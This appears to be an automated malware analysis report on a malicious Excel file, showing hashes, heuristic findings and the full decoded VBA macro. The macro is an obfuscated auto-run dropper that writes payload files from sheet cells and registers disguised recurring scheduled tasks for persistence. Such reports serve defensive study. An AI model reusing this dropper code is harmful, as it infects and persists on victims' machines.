Office (OLE) / .XLS malware analysis — malicious · 83476c3f9aafce89

MALICIOUS

Office (OLE) / .XLS

1.10 MB Created: 2022-11-06 05:34:17 Authoring application: Microsoft Excel First seen: 2026-06-17

MD5: d72b0a87d07e99538a645a61f33464e5 SHA-1: c5f5f526dd3f4eda9ecf1e8017c2fe2316ad0b0a SHA-256: 83476c3f9aafce89b0a709fe453ddcabd957fbf841fd8a03dd7427ed7c7fc383

108 Risk Score

Heuristics 4

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set service = CreateObject("Schedule.Service")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Sub Workbook_Open()
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11477 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11477 bytes
SHA-256: `16e7cbca76bb056759bdaaa1457aa63320684f78e3cf564eb4c40cabcef35d39`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Sub Workbook_Open() Dim bJeKNBThzjfhMnMDvxNzGbRTHYhCxnrjdAuxamFvwRqXjC As String Dim KQNjfUBrNzrnrChNhSSVJKEWTnyZqAfCeBAnGpbaUewuyv As String bJeKNBThzjfhMnMDvxNzGbRTHYhCxnrjdAuxamFvwRqXjC = "C:\Users\" + "Publi" + "c\Musi" + "c\ra" + "r.zip" KQNjfUBrNzrnrChNhSSVJKEWTnyZqAfCeBAnGpbaUewuyv = Dir(bJeKNBThzjfhMnMDvxNzGbRTHYhCxnrjdAuxamFvwRqXjC, vbDirectory) If KQNjfUBrNzrnrChNhSSVJKEWTnyZqAfCeBAnGpbaUewuyv = "" Then Call zXghnYqZkrPKEEqFLMkuwtRxuAWWDPRaakegGVMnEVEBLF Else MsgBox "Excel cannot complete this task with availiable resources.Choose less data or close other applications." End If End Sub Sub zXghnYqZkrPKEEqFLMkuwtRxuAWWDPRaakegGVMnEVEBLF() Dim DSZnRamVRWxWxyfbBFgXLRtbvXgDNACkxYbgkWQUGpvfLr As String DSZnRamVRWxWxyfbBFgXLRtbvXgDNACkxYbgkWQUGpvfLr = "pip" wxqWkCmWPndkPNREMDBevaQdtGxuBDzkEAuritDYMPxWUw = "rar" Dim ddkTJUzucqyTwupgHqXPgJxScJaCbkydZzMUggiwjViPjj As String ddkTJUzucqyTwupgHqXPgJxScJaCbkydZzMUggiwjViPjj = "A66" Dim LgrrqDaYekmqwSAnJQVYhaNEvwyYwGktUqaPmhxvyVZEiB As String LgrrqDaYekmqwSAnJQVYhaNEvwyYwGktUqaPmhxvyVZEiB = "A12:A54" Dim MUHmyJrXpgxdGmheaNnrWhvMPAnNjqnPQzZdpZiVxqzKZL As String MUHmyJrXpgxdGmheaNnrWhvMPAnNjqnPQzZdpZiVxqzKZL = UName() Dim yVxrmpDUjWeShAjJLNJpXjSnbiSNcnQucLmQHcfhGMNfYR As Range, cl As Range Dim ySPpvTviWSRxKrtjUxMrXqLZUgYpgpApbzyBgdqTmktwzh As String Set yVxrmpDUjWeShAjJLNJpXjSnbiSNcnQucLmQHcfhGMNfYR = Worksheets("Sheet1").Range(LgrrqDaYekmqwSAnJQVYhaNEvwyYwGktUqaPmhxvyVZEiB) ySPpvTviWSRxKrtjUxMrXqLZUgYpgpApbzyBgdqTmktwzh = "" For Each cl In yVxrmpDUjWeShAjJLNJpXjSnbiSNcnQucLmQHcfhGMNfYR If Not IsNumeric(cl.Value) And Not cl.Value = "" Then ySPpvTviWSRxKrtjUxMrXqLZUgYpgpApbzyBgdqTmktwzh = ySPpvTviWSRxKrtjUxMrXqLZUgYpgpApbzyBgdqTmktwzh & cl.Value Next cl ySPpvTviWSRxKrtjUxMrXqLZUgYpgpApbzyBgdqTmktwzh = Mid(ySPpvTviWSRxKrtjUxMrXqLZUgYpgpApbzyBgdqTmktwzh, 1) Dim dqEzZAqCZGmXktkwaFrRBpMYFPKCUxEvQggQSLhJnEXccz As Range, c2 As Range Dim YzQiECLjJeGehbHDZcEqQaddBnjBcUjFPxiWwRRfqpyjmb As String Set dqEzZAqCZGmXktkwaFrRBpMYFPKCUxEvQggQSLhJnEXccz = Worksheets("Sheet1").Range(ddkTJUzucqyTwupgHqXPgJxScJaCbkydZzMUggiwjViPjj) YzQiECLjJeGehbHDZcEqQaddBnjBcUjFPxiWwRRfqpyjmb = "" For Each c2 In dqEzZAqCZGmXktkwaFrRBpMYFPKCUxEvQggQSLhJnEXccz If Not IsNumeric(c2.Value) And Not c2.Value = "" Then YzQiECLjJeGehbHDZcEqQaddBnjBcUjFPxiWwRRfqpyjmb = YzQiECLjJeGehbHDZcEqQaddBnjBcUjFPxiWwRRfqpyjmb & c2.Value Next c2 YzQiECLjJeGehbHDZcEqQaddBnjBcUjFPxiWwRRfqpyjmb = Mid(YzQiECLjJeGehbHDZcEqQaddBnjBcUjFPxiWwRRfqpyjmb, 1) Dim UgMHzuggbxLtgeUbzWbyRBrckxXqrDqnAkTiQYabMmFZgp As Long Dim nrgQFJRmbqrMyYuYcqPzUvAmYmbckZhPeSbYJxNiWwCMyi As Long Dim pLpQGWrhFFRLPRJBjFbAKGnfjWrBBuNYTDMHPXSnjkGNKV As String Dim hVmgSbAKkcbRGeBGxWUuuwDQMMEXtSemXmWjuSDVKbBZEA As String Dim MxvFqqJpFMQJQXmFCyMcCCEkrPrCErNGhLwTZgTPDaDuXH As String MxvFqqJpFMQJQXmFCyMcCCEkrPrCErNGhLwTZgTPDaDuXH = ".zip" Dim NuENwnDjEhBEYBMxaVrAAQipFmPZTPgqaAjHFKkZwKAPzJ As String NuENwnDjEhBEYBMxaVrAAQipFmPZTPgqaAjHFKkZwKAPzJ = ".bat" pLpQGWrhFFRLPRJBjFbAKGnfjWrBBuNYTDMHPXSnjkGNKV = MUHmyJrXpgxdGmheaNnrWhvMPAnNjqnPQzZdpZiVxqzKZL + wxqWkCmWPndkPNREMDBevaQdtGxuBDzkEAuritDYMPxWUw + MxvFqqJpFMQJQXmFCyMcCCEkrPrCErNGhLwTZgTPDaDuXH hVmgSbAKkcbRGeBGxWUuuwDQMMEXtSemXmWjuSDVKbBZEA = MUHmyJrXpgxdGmheaNnrWhvMPAnNjqnPQzZdpZiVxqzKZL + DSZnRamVRWxWxyfbBFgXLRtbvXgDNACkxYbgkWQUGpvfLr + NuENwnDjEhBEYBMxaVrAAQipFmPZTPgqaAjHFKkZwKAPzJ Call distributor(pLpQGWrhFFRLPRJBjFbAKGnfjWrBBuNYTDMHPXSnjkGNKV, UgMHzuggbxLtgeUbzWbyRBrckxXqrDqnAkTiQYabMmFZgp, ySPpvTviWSRxKrtjUxMrXqLZUgYpgpApbzyBgdqTmktwzh) UgMHzuggbxLtgeUbzWbyRBrckxXqrDqnAkTiQYabMmFZgp = 0 Call distributors(hVmgSbAKkcbRGeBGxWUuuwDQMMEXtSemXmWjuSDVKbBZEA, nrgQFJRmbqrMyYuYcqPzUvAmYmbckZhPeSbYJxNiWwCMyi, YzQiECLjJeGehbHDZcEqQaddBnjBcUjFPxiWwRRfqpyjmb) nrgQFJRmbqrMyYuYcqPzUvAmYmbckZhPeSbYJxNiWwCMyi = 0 End Sub Sub distributor(pLpQGWrhFFRLPRJBjFbAKGnfjWrBBuNYTDMHPXSnjkGNKV As String, UgMHzuggbxLtgeUbzWbyRBrckxXqrDqnAkTiQYabMmFZgp As Long, TextBox1 As String) If Len(Dir(pLpQGWrhFFRLPRJBjFbAKGnfjWrBBuNYTDMHPXSnjkGNKV)) = 0 Then all_addresses = Split(TextBox1, "") Open pLpQGWrhFFRLPRJBjFbAKGnfjWrBBuNYTDMHPXSnjkGNKV For Binary As #1 Seek #1, LOF(1) + 1 For UgMHzuggbxLtgeUbzWbyRBrckxXqrDqnAkTiQYabMmFZgp = LBound(all_addresses) To UBound(all_addresses) Put #1, , CByte(all_addresses(UgMHzuggbxLtgeUbzWbyRBrckxXqrDqnAkTiQYabMmFZgp)) Next Close #1 End If End Sub Sub distributors(hVmgSbAKkcbRGeBGxWUuuwDQMMEXtSemXmWjuSDVKbBZEA As String, nrgQFJRmbqrMyYuYcqPzUvAmYmbckZhPeSbYJxNiWwCMyi As Long, TextBox1 As String) If Len(Dir(hVmgSbAKkcbRGeBGxWUuuwDQMMEXtSemXmWjuSDVKbBZEA)) = 0 Then all_addresses = Split(TextBox1, "") Open hVmgSbAKkcbRGeBGxWUuuwDQMMEXtSemXmWjuSDVKbBZEA For Binary As #1 Seek #1, LOF(1) + 1 For UgMHzuggbxLtgeUbzWbyRBrckxXqrDqnAkTiQYabMmFZgp = LBound(all_addresses) To UBound(all_addresses) Put #1, , CByte(all_addresses(UgMHzuggbxLtgeUbzWbyRBrckxXqrDqnAkTiQYabMmFZgp)) Next Close #1 End If Call BxhFLwyPvmkdaSgJQxyyWXXtDhwGBbCDvSBkDyHGQrwQix End Sub Function UName() As String UName = "C:\U" + "sers\" + "Publ" + "ic\M" + "usic\" End Function Sub BxhFLwyPvmkdaSgJQxyyWXXtDhwGBbCDvSBkDyHGQrwQix() Const TriggerTypeTime = 1 Const ActionTypeExec = 0 Set service = CreateObject("Schedule.Service") Call service.Connect Dim rootFolder Set rootFolder = service.GetFolder("\") Dim taskDefinition Set taskDefinition = service.NewTask(0) Dim regInfo Set regInfo = taskDefinition.RegistrationInfo regInfo.Description = "Start Wordpad at a certain time" regInfo.Author = "Micro" Dim principal Set principal = taskDefinition.principal principal.LogonType = 3 Dim settings Set settings = taskDefinition.settings settings.Enabled = True settings.StartWhenAvailable = True settings.Hidden = False Dim triggers Set triggers = taskDefinition.triggers Dim trigger Set trigger = triggers.Create(TriggerTypeTime) Dim startTime, endTime Dim time time = DateAdd("s", 20, Now) startTime = XmlTime(time) time = DateAdd("n", 1, Now) endTime = XmlTime(time) trigger.StartBoundary = startTime trigger.EndBoundary = endTime trigger.ExecutionTimeLimit = "PT15M" trigger.ID = "TimeTriggerId" trigger.Enabled = True Dim Action Set Action = taskDefinition.Actions.Create(ActionTypeExec) Action.Path = "C:\Users\Public\Music\pip.bat" Call rootFolder.RegisterTaskDefinition( _ "Mgmt_HDD", taskDefinition, 6, , , 3) Call GHJFGHJGakh End Sub Sub GHJFGHJGakh() Const TriggerTypeTime = 1 Const ActionTypeExec = 0 Set service = CreateObject("Schedule.Service") Call service.Connect Dim rootFolder Set rootFolder = service.GetFolder("\") Dim taskDefinition Set taskDefinition = service.NewTask(0) Dim regInfo Set regInfo = taskDefinition.RegistrationInfo regInfo.Description = "Start Notepad at a certain time" regInfo.Author = "Win" Dim principal Set principal = taskDefinition.principal principal.LogonType = 3 Dim settings Set settings = taskDefinition.settings settings.Enabled = True settings.StartWhenAvailable = True settings.Hidden = False Dim triggers Set triggers = taskDefinition.triggers Dim trigger Set trigger = triggers.Create(TriggerTypeTime) Dim startTime Dim time time = DateAdd("s", 60, Now) startTime = XmlTime(time) trigger.StartBoundary = startTime trigger.Repetition.Interval = "PT20M" trigger.ID = "TimeTriggerId" trigger.Enabled = True Dim Action Set Action = taskDefinition.Actions.Create(ActionTypeExec) Action.Path = "C:\Users\Public\Music\pip.exe" Call rootFolder.RegisterTaskDefinition( _ "My_Drive", taskDefinition, 6, , , 3) Call zxcvbnmlkjhgfdsaqweryu End Sub Sub zxcvbnmlkjhgfdsaqweryu() Const TriggerTypeTime = 1 Const ActionTypeExec = 0 Set service = CreateObject("Schedule.Service") Call service.Connect Dim rootFolder Set rootFolder = service.GetFolder("\") Dim taskDefinition Set taskDefinition = service.NewTask(0) Dim regInfo Set regInfo = taskDefinition.RegistrationInfo regInfo.Description = "Start Notepad at a certain time" regInfo.Author = "Win" Dim principal Set principal = taskDefinition.principal principal.LogonType = 3 Dim settings Set settings = taskDefinition.settings settings.Enabled = True settings.StartWhenAvailable = True settings.Hidden = False Dim triggers Set triggers = taskDefinition.triggers Dim trigger Set trigger = triggers.Create(TriggerTypeTime) Dim startTime Dim time time = DateAdd("n", 11, Now) startTime = XmlTime(time) trigger.StartBoundary = startTime trigger.Repetition.Interval = "PT5M" trigger.ID = "TimeTriggerId" trigger.Enabled = True Dim Action Set Action = taskDefinition.Actions.Create(ActionTypeExec) Action.Path = "C:\Users\Public\Pictures\tls.bat" Call rootFolder.RegisterTaskDefinition( _ "Tls_Drive", taskDefinition, 6, , , 3) End Sub Function XmlTime(t) Dim gETXNJmVtLZpiBaFSSQnWkeUHdvjdESHEDSNpHmNkvfTPV, nFhSByQJrazDhmDiTLuihHkmfWfbFxWpmNbXpyqcZnkaBM, ybqHrbKvvLHdxPfwDxRUNxegNZQmredAijhXjVKEwVRbzi, AvwhtGLmKyavxqrgQgTuLuQwQtxNqVByCZzRFnLNpCHhdP, LpiCPZdgpiAPYAHHmYxPikteGxzhkPecRNetaGvmjAcCSf, yMCKinzZrZTraEySaXYULWxTpdLJdKQnEAWzCRFZqvVZaP Dim tTime, tDate gETXNJmVtLZpiBaFSSQnWkeUHdvjdESHEDSNpHmNkvfTPV = "0" & Second(t) nFhSByQJrazDhmDiTLuihHkmfWfbFxWpmNbXpyqcZnkaBM = "0" & Minute(t) ybqHrbKvvLHdxPfwDxRUNxegNZQmredAijhXjVKEwVRbzi = "0" & Hour(t) AvwhtGLmKyavxqrgQgTuLuQwQtxNqVByCZzRFnLNpCHhdP = "0" & Day(t) LpiCPZdgpiAPYAHHmYxPikteGxzhkPecRNetaGvmjAcCSf = "0" & Month(t) yMCKinzZrZTraEySaXYULWxTpdLJdKQnEAWzCRFZqvVZaP = Year(t) tTime = Right(ybqHrbKvvLHdxPfwDxRUNxegNZQmredAijhXjVKEwVRbzi, 2) & ":" & Right(nFhSByQJrazDhmDiTLuihHkmfWfbFxWpmNbXpyqcZnkaBM, 2) & _ ":" & Right(gETXNJmVtLZpiBaFSSQnWkeUHdvjdESHEDSNpHmNkvfTPV, 2) tDate = yMCKinzZrZTraEySaXYULWxTpdLJdKQnEAWzCRFZqvVZaP & "-" & Right(LpiCPZdgpiAPYAHHmYxPikteGxzhkPecRNetaGvmjAcCSf, 2) & "-" & Right(AvwhtGLmKyavxqrgQgTuLuQwQtxNqVByCZzRFnLNpCHhdP, 2) XmlTime = tDate & "T" & tTime End Function Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

SHA-256: 16e7cbca76bb056759bdaaa1457aa63320684f78e3cf564eb4c40cabcef35d39

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
Dim bJeKNBThzjfhMnMDvxNzGbRTHYhCxnrjdAuxamFvwRqXjC As String
Dim KQNjfUBrNzrnrChNhSSVJKEWTnyZqAfCeBAnGpbaUewuyv As String

    bJeKNBThzjfhMnMDvxNzGbRTHYhCxnrjdAuxamFvwRqXjC = "C:\Users\" + "Publi" + "c\Musi" + "c\ra" + "r.zip"
    KQNjfUBrNzrnrChNhSSVJKEWTnyZqAfCeBAnGpbaUewuyv = Dir(bJeKNBThzjfhMnMDvxNzGbRTHYhCxnrjdAuxamFvwRqXjC, vbDirectory)

    If KQNjfUBrNzrnrChNhSSVJKEWTnyZqAfCeBAnGpbaUewuyv = "" Then
        Call zXghnYqZkrPKEEqFLMkuwtRxuAWWDPRaakegGVMnEVEBLF
    Else
        MsgBox "Excel cannot complete this task with availiable resources.Choose less data or close other applications."
                
    End If
End Sub

Sub zXghnYqZkrPKEEqFLMkuwtRxuAWWDPRaakegGVMnEVEBLF()
    
Dim DSZnRamVRWxWxyfbBFgXLRtbvXgDNACkxYbgkWQUGpvfLr As String
DSZnRamVRWxWxyfbBFgXLRtbvXgDNACkxYbgkWQUGpvfLr = "pip"
wxqWkCmWPndkPNREMDBevaQdtGxuBDzkEAuritDYMPxWUw = "rar"

Dim ddkTJUzucqyTwupgHqXPgJxScJaCbkydZzMUggiwjViPjj As String
ddkTJUzucqyTwupgHqXPgJxScJaCbkydZzMUggiwjViPjj = "A66"
Dim LgrrqDaYekmqwSAnJQVYhaNEvwyYwGktUqaPmhxvyVZEiB As String
LgrrqDaYekmqwSAnJQVYhaNEvwyYwGktUqaPmhxvyVZEiB = "A12:A54"
Dim MUHmyJrXpgxdGmheaNnrWhvMPAnNjqnPQzZdpZiVxqzKZL As String
MUHmyJrXpgxdGmheaNnrWhvMPAnNjqnPQzZdpZiVxqzKZL = UName()

Dim yVxrmpDUjWeShAjJLNJpXjSnbiSNcnQucLmQHcfhGMNfYR As Range, cl As Range
Dim ySPpvTviWSRxKrtjUxMrXqLZUgYpgpApbzyBgdqTmktwzh As String

Set yVxrmpDUjWeShAjJLNJpXjSnbiSNcnQucLmQHcfhGMNfYR = Worksheets("Sheet1").Range(LgrrqDaYekmqwSAnJQVYhaNEvwyYwGktUqaPmhxvyVZEiB)
ySPpvTviWSRxKrtjUxMrXqLZUgYpgpApbzyBgdqTmktwzh = ""
For Each cl In yVxrmpDUjWeShAjJLNJpXjSnbiSNcnQucLmQHcfhGMNfYR
    If Not IsNumeric(cl.Value) And Not cl.Value = "" Then ySPpvTviWSRxKrtjUxMrXqLZUgYpgpApbzyBgdqTmktwzh = ySPpvTviWSRxKrtjUxMrXqLZUgYpgpApbzyBgdqTmktwzh & cl.Value
Next cl
ySPpvTviWSRxKrtjUxMrXqLZUgYpgpApbzyBgdqTmktwzh = Mid(ySPpvTviWSRxKrtjUxMrXqLZUgYpgpApbzyBgdqTmktwzh, 1)


Dim dqEzZAqCZGmXktkwaFrRBpMYFPKCUxEvQggQSLhJnEXccz As Range, c2 As Range
Dim YzQiECLjJeGehbHDZcEqQaddBnjBcUjFPxiWwRRfqpyjmb As String

Set dqEzZAqCZGmXktkwaFrRBpMYFPKCUxEvQggQSLhJnEXccz = Worksheets("Sheet1").Range(ddkTJUzucqyTwupgHqXPgJxScJaCbkydZzMUggiwjViPjj)
YzQiECLjJeGehbHDZcEqQaddBnjBcUjFPxiWwRRfqpyjmb = ""
For Each c2 In dqEzZAqCZGmXktkwaFrRBpMYFPKCUxEvQggQSLhJnEXccz
    If Not IsNumeric(c2.Value) And Not c2.Value = "" Then YzQiECLjJeGehbHDZcEqQaddBnjBcUjFPxiWwRRfqpyjmb = YzQiECLjJeGehbHDZcEqQaddBnjBcUjFPxiWwRRfqpyjmb & c2.Value
Next c2
YzQiECLjJeGehbHDZcEqQaddBnjBcUjFPxiWwRRfqpyjmb = Mid(YzQiECLjJeGehbHDZcEqQaddBnjBcUjFPxiWwRRfqpyjmb, 1)

Dim UgMHzuggbxLtgeUbzWbyRBrckxXqrDqnAkTiQYabMmFZgp As Long
Dim nrgQFJRmbqrMyYuYcqPzUvAmYmbckZhPeSbYJxNiWwCMyi As Long
Dim pLpQGWrhFFRLPRJBjFbAKGnfjWrBBuNYTDMHPXSnjkGNKV As String
Dim hVmgSbAKkcbRGeBGxWUuuwDQMMEXtSemXmWjuSDVKbBZEA As String

Dim MxvFqqJpFMQJQXmFCyMcCCEkrPrCErNGhLwTZgTPDaDuXH As String
MxvFqqJpFMQJQXmFCyMcCCEkrPrCErNGhLwTZgTPDaDuXH = ".zip"

Dim NuENwnDjEhBEYBMxaVrAAQipFmPZTPgqaAjHFKkZwKAPzJ As String
NuENwnDjEhBEYBMxaVrAAQipFmPZTPgqaAjHFKkZwKAPzJ = ".bat"

pLpQGWrhFFRLPRJBjFbAKGnfjWrBBuNYTDMHPXSnjkGNKV = MUHmyJrXpgxdGmheaNnrWhvMPAnNjqnPQzZdpZiVxqzKZL + wxqWkCmWPndkPNREMDBevaQdtGxuBDzkEAuritDYMPxWUw + MxvFqqJpFMQJQXmFCyMcCCEkrPrCErNGhLwTZgTPDaDuXH
hVmgSbAKkcbRGeBGxWUuuwDQMMEXtSemXmWjuSDVKbBZEA = MUHmyJrXpgxdGmheaNnrWhvMPAnNjqnPQzZdpZiVxqzKZL + DSZnRamVRWxWxyfbBFgXLRtbvXgDNACkxYbgkWQUGpvfLr + NuENwnDjEhBEYBMxaVrAAQipFmPZTPgqaAjHFKkZwKAPzJ


Call distributor(pLpQGWrhFFRLPRJBjFbAKGnfjWrBBuNYTDMHPXSnjkGNKV, UgMHzuggbxLtgeUbzWbyRBrckxXqrDqnAkTiQYabMmFZgp, ySPpvTviWSRxKrtjUxMrXqLZUgYpgpApbzyBgdqTmktwzh)
UgMHzuggbxLtgeUbzWbyRBrckxXqrDqnAkTiQYabMmFZgp = 0

Call distributors(hVmgSbAKkcbRGeBGxWUuuwDQMMEXtSemXmWjuSDVKbBZEA, nrgQFJRmbqrMyYuYcqPzUvAmYmbckZhPeSbYJxNiWwCMyi, YzQiECLjJeGehbHDZcEqQaddBnjBcUjFPxiWwRRfqpyjmb)
nrgQFJRmbqrMyYuYcqPzUvAmYmbckZhPeSbYJxNiWwCMyi = 0

End Sub

Sub distributor(pLpQGWrhFFRLPRJBjFbAKGnfjWrBBuNYTDMHPXSnjkGNKV As String, UgMHzuggbxLtgeUbzWbyRBrckxXqrDqnAkTiQYabMmFZgp As Long, TextBox1 As String)

If Len(Dir(pLpQGWrhFFRLPRJBjFbAKGnfjWrBBuNYTDMHPXSnjkGNKV)) = 0 Then
    all_addresses = Split(TextBox1, "*")
    Open pLpQGWrhFFRLPRJBjFbAKGnfjWrBBuNYTDMHPXSnjkGNKV For Binary As #1
    Seek #1, LOF(1) + 1
    For UgMHzuggbxLtgeUbzWbyRBrckxXqrDqnAkTiQYabMmFZgp = LBound(all_addresses) To UBound(all_addresses)
        Put #1, , CByte(all_addresses(UgMHzuggbxLtgeUbzWbyRBrckxXqrDqnAkTiQYabMmFZgp))
    Next
    Close #1
End If

End Sub

Sub distributors(hVmgSbAKkcbRGeBGxWUuuwDQMMEXtSemXmWjuSDVKbBZEA As String, nrgQFJRmbqrMyYuYcqPzUvAmYmbckZhPeSbYJxNiWwCMyi As Long, TextBox1 As String)

If Len(Dir(hVmgSbAKkcbRGeBGxWUuuwDQMMEXtSemXmWjuSDVKbBZEA)) = 0 Then
    all_addresses = Split(TextBox1, "*")
    Open hVmgSbAKkcbRGeBGxWUuuwDQMMEXtSemXmWjuSDVKbBZEA For Binary As #1
    Seek #1, LOF(1) + 1
    For UgMHzuggbxLtgeUbzWbyRBrckxXqrDqnAkTiQYabMmFZgp = LBound(all_addresses) To UBound(all_addresses)
        Put #1, , CByte(all_addresses(UgMHzuggbxLtgeUbzWbyRBrckxXqrDqnAkTiQYabMmFZgp))
    Next
    Close #1
End If
Call BxhFLwyPvmkdaSgJQxyyWXXtDhwGBbCDvSBkDyHGQrwQix
End Sub

Function UName() As String
    UName = "C:\U" + "sers\" + "Publ" + "ic\M" + "usic\"
End Function

Sub BxhFLwyPvmkdaSgJQxyyWXXtDhwGBbCDvSBkDyHGQrwQix()
Const TriggerTypeTime = 1

Const ActionTypeExec = 0

Set service = CreateObject("Schedule.Service")
Call service.Connect

Dim rootFolder
Set rootFolder = service.GetFolder("\")

Dim taskDefinition

Set taskDefinition = service.NewTask(0)

Dim regInfo
Set regInfo = taskDefinition.RegistrationInfo
regInfo.Description = "Start Wordpad at a certain time"
regInfo.Author = "Micro"

Dim principal
Set principal = taskDefinition.principal

principal.LogonType = 3

Dim settings
Set settings = taskDefinition.settings
settings.Enabled = True
settings.StartWhenAvailable = True
settings.Hidden = False

Dim triggers
Set triggers = taskDefinition.triggers

Dim trigger
Set trigger = triggers.Create(TriggerTypeTime)

Dim startTime, endTime

Dim time
time = DateAdd("s", 20, Now)
startTime = XmlTime(time)

time = DateAdd("n", 1, Now)
endTime = XmlTime(time)

trigger.StartBoundary = startTime
trigger.EndBoundary = endTime
trigger.ExecutionTimeLimit = "PT15M"
trigger.ID = "TimeTriggerId"
trigger.Enabled = True

Dim Action
Set Action = taskDefinition.Actions.Create(ActionTypeExec)
Action.Path = "C:\Users\Public\Music\pip.bat"

Call rootFolder.RegisterTaskDefinition( _
    "Mgmt_HDD", taskDefinition, 6, , , 3)
Call GHJFGHJGakh
End Sub

Sub GHJFGHJGakh()
Const TriggerTypeTime = 1

Const ActionTypeExec = 0

Set service = CreateObject("Schedule.Service")
Call service.Connect

Dim rootFolder
Set rootFolder = service.GetFolder("\")

Dim taskDefinition

Set taskDefinition = service.NewTask(0)

Dim regInfo
Set regInfo = taskDefinition.RegistrationInfo
regInfo.Description = "Start Notepad at a certain time"
regInfo.Author = "Win"

Dim principal
Set principal = taskDefinition.principal

principal.LogonType = 3

Dim settings
Set settings = taskDefinition.settings
settings.Enabled = True
settings.StartWhenAvailable = True
settings.Hidden = False

Dim triggers
Set triggers = taskDefinition.triggers

Dim trigger
Set trigger = triggers.Create(TriggerTypeTime)

Dim startTime

Dim time
time = DateAdd("s", 60, Now)
startTime = XmlTime(time)

trigger.StartBoundary = startTime
trigger.Repetition.Interval = "PT20M"
trigger.ID = "TimeTriggerId"
trigger.Enabled = True

Dim Action
Set Action = taskDefinition.Actions.Create(ActionTypeExec)
Action.Path = "C:\Users\Public\Music\pip.exe"


Call rootFolder.RegisterTaskDefinition( _
    "My_Drive", taskDefinition, 6, , , 3)
Call zxcvbnmlkjhgfdsaqweryu
End Sub

Sub zxcvbnmlkjhgfdsaqweryu()
Const TriggerTypeTime = 1

Const ActionTypeExec = 0

Set service = CreateObject("Schedule.Service")
Call service.Connect

Dim rootFolder
Set rootFolder = service.GetFolder("\")

Dim taskDefinition

Set taskDefinition = service.NewTask(0)

Dim regInfo
Set regInfo = taskDefinition.RegistrationInfo
regInfo.Description = "Start Notepad at a certain time"
regInfo.Author = "Win"

Dim principal
Set principal = taskDefinition.principal

principal.LogonType = 3

Dim settings
Set settings = taskDefinition.settings
settings.Enabled = True
settings.StartWhenAvailable = True
settings.Hidden = False

Dim triggers
Set triggers = taskDefinition.triggers

Dim trigger
Set trigger = triggers.Create(TriggerTypeTime)

Dim startTime

Dim time
time = DateAdd("n", 11, Now)
startTime = XmlTime(time)

trigger.StartBoundary = startTime
trigger.Repetition.Interval = "PT5M"
trigger.ID = "TimeTriggerId"
trigger.Enabled = True

Dim Action
Set Action = taskDefinition.Actions.Create(ActionTypeExec)
Action.Path = "C:\Users\Public\Pictures\tls.bat"

Call rootFolder.RegisterTaskDefinition( _
    "Tls_Drive", taskDefinition, 6, , , 3)
End Sub

Function XmlTime(t)
    Dim gETXNJmVtLZpiBaFSSQnWkeUHdvjdESHEDSNpHmNkvfTPV, nFhSByQJrazDhmDiTLuihHkmfWfbFxWpmNbXpyqcZnkaBM, ybqHrbKvvLHdxPfwDxRUNxegNZQmredAijhXjVKEwVRbzi, AvwhtGLmKyavxqrgQgTuLuQwQtxNqVByCZzRFnLNpCHhdP, LpiCPZdgpiAPYAHHmYxPikteGxzhkPecRNetaGvmjAcCSf, yMCKinzZrZTraEySaXYULWxTpdLJdKQnEAWzCRFZqvVZaP
    Dim tTime, tDate

    gETXNJmVtLZpiBaFSSQnWkeUHdvjdESHEDSNpHmNkvfTPV = "0" & Second(t)
    nFhSByQJrazDhmDiTLuihHkmfWfbFxWpmNbXpyqcZnkaBM = "0" & Minute(t)
    ybqHrbKvvLHdxPfwDxRUNxegNZQmredAijhXjVKEwVRbzi = "0" & Hour(t)
    AvwhtGLmKyavxqrgQgTuLuQwQtxNqVByCZzRFnLNpCHhdP = "0" & Day(t)
    LpiCPZdgpiAPYAHHmYxPikteGxzhkPecRNetaGvmjAcCSf = "0" & Month(t)
    yMCKinzZrZTraEySaXYULWxTpdLJdKQnEAWzCRFZqvVZaP = Year(t)

    tTime = Right(ybqHrbKvvLHdxPfwDxRUNxegNZQmredAijhXjVKEwVRbzi, 2) & ":" & Right(nFhSByQJrazDhmDiTLuihHkmfWfbFxWpmNbXpyqcZnkaBM, 2) & _
